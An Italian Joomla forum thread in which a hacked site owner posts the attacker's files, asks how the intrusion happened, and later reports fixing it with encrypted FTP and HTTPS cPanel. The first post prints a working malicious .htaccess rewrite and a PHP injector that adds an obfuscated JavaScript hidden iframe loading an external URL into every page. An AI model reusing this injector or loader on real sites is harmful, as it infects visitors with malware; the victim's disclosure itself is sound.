Back to top

Autore Topic: Hacker sul mio sito Joomla 1.15.14  (Letto 5049 volte)

Offline nibiru

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Hacker sul mio sito Joomla 1.15.14
« il: 13 Set 2009, 19:34:45 »
Ciao a tutti,
             mi è capitata una cosa molto strana:
Il 5 settembre il mio sito joomla prima dell'attacco era così composto:
joomla 1.15.9
community builder 1.2

Poi sono entrati e mi hanno attivato e scritto l'.htaccess con questi parametri:

Codice: [Seleziona]
#mmmmd

RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]

dove mi hanno creato nella root il file

.heder.php.php

<?php

$frame_code 
'<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';



function 
get_file_dir_($file) {

    global 
$argv;

    
$dir dirname(getcwd() . '/' $file);

    
$curDir getcwd();

    
chdir($dir);

    
$dir getcwd();

    
chdir($curDir);

    return 
$dir;

}



function 
callback($data)

{

global $frame_code;

if(preg_match("/(<.*?body.*?>
)/i", $data) > 0)

return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);

else return $data.$frame_code;

}



ob_start('callback');

$file = $_GET['qq'];

chdir(get_file_dir_($file));



include($file);
?>
Inoltre mi hanno messo un iframe nella index.html tanto che una volta che scarico il file index.html sul pc AVG mi dice che è un virus /html :(.
Hanno pure modificato la cartella xmlrpc inserendoci sempre lo stesso .htaccess e .heder.php.php.

Praticamente quando provo ad accedere alla home ho pagina bianca e la parte di administrator sempre pagina bianca.

Ho ripristinato un backup , ho aggiornato alla versione 1.15.14 stabile , ho cambiato tutte le pwd admin /FTP / mysql veramente complesse.

Ma purtroppo oggi ritrovo lo stesso problema pagina bianca , l'hosting serverplan mi dice che il problema è il mio di aggiornamento di joomla ma più di così non so cosa fare, come fanno ad entrare nel mio spazio e fare tutto questo?
« Ultima modifica: 13 Set 2009, 19:40:54 da 56francesco »

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14
« Risposta #1 il: 13 Set 2009, 19:43:21 »
nibiru se proprio necessario utilizza il tag code per quelle righe..

anche se non serve diffondere ulteriormente certi codici..

ho visto che citi un file index.html utilizzavi una intro per caso?
potrebbe essere quella la porta di accesso,
hai un link al sito? 
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline nibiru

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14
« Risposta #2 il: 13 Set 2009, 19:55:50 »
Il codice penso sia di aiuto ad altri dato che su google ne ho trovati molti infetti comunque ora ho ripristinato il bk prima dell'attacco sperando che non lo riattaccano cmq il link è www.andrealedaro.com non utilizzo intro ma 2 template.

Offline krikykk

  • Nuovo arrivato
  • *
  • Post: 28
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14
« Risposta #3 il: 15 Set 2009, 04:37:17 »
capitato un attacco simile anche a me con la versione 1.0 , hanno preso le pass di tutto .. compresi grdegli altri siti che erano ospitati sull'hosting ...
capita ogni tanto . ..
ma una cosa che non riesco a capire sul tuo sito

perche la home page fa una chiamata di com_login ???
controlla bene che l'errore e la" porta aperta agli inturi " forse sta qui .

Offline nibiru

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14
« Risposta #4 il: 15 Set 2009, 16:07:44 »
Ho dovuto impostare la home che fa una chiamata di login perchè altrimenti gli utenti quando si loggano mi entrano nella home anzichè nel pagina di mio interesse.
Comunque confermo anche a me che mi hanno bucato in maniera simile tutti i siti joomla sia 1.15.14 che 1.0 che avevo sull'hosting di Serverplan quindi ora vi chiedo se riescono a sniffare la pwd di Cpanel il problema è di joomla o è un problema di sicurezza dei server di Serverplan? Alla fine krikykk come hai risolto?
Grazie

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14
« Risposta #5 il: 18 Set 2009, 02:18:37 »
Ciao,
mi è capitato lo stesso problema di nibiru su un hosting condiviso ed escluderei sia un problema di joomla perchè hanno infettato con lo stesso sistema anche un sito in html  ???  ed uno in wordpress.
Ora sto cambiando tutte le credenziali ma :
- o hanno sniffato la mia pass dell'ftp ed allora hanno avuto accesso a tutti i siti
- o la sicurezza del server è scadente?
- o cosa?


Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline nibiru

  • Nuovo arrivato
  • *
  • Post: 7
    • Mostra profilo
Re:Hacker sul mio sito Joomla 1.15.14[RISOLTO]
« Risposta #6 il: 19 Set 2009, 00:03:41 »
Risolto il grave problema, praticamente sniffavano completamente le pwd dell'FTP/Cpanel di tutti i miei siti presenti su l'hosting di serverplan ,per risolvere il problema abbiamo attivato l'FTPES su tutti i miei siti e ho dovuto utilizzare cpanel con l'https.
Grazie

 



Web Design Bolzano Kreatif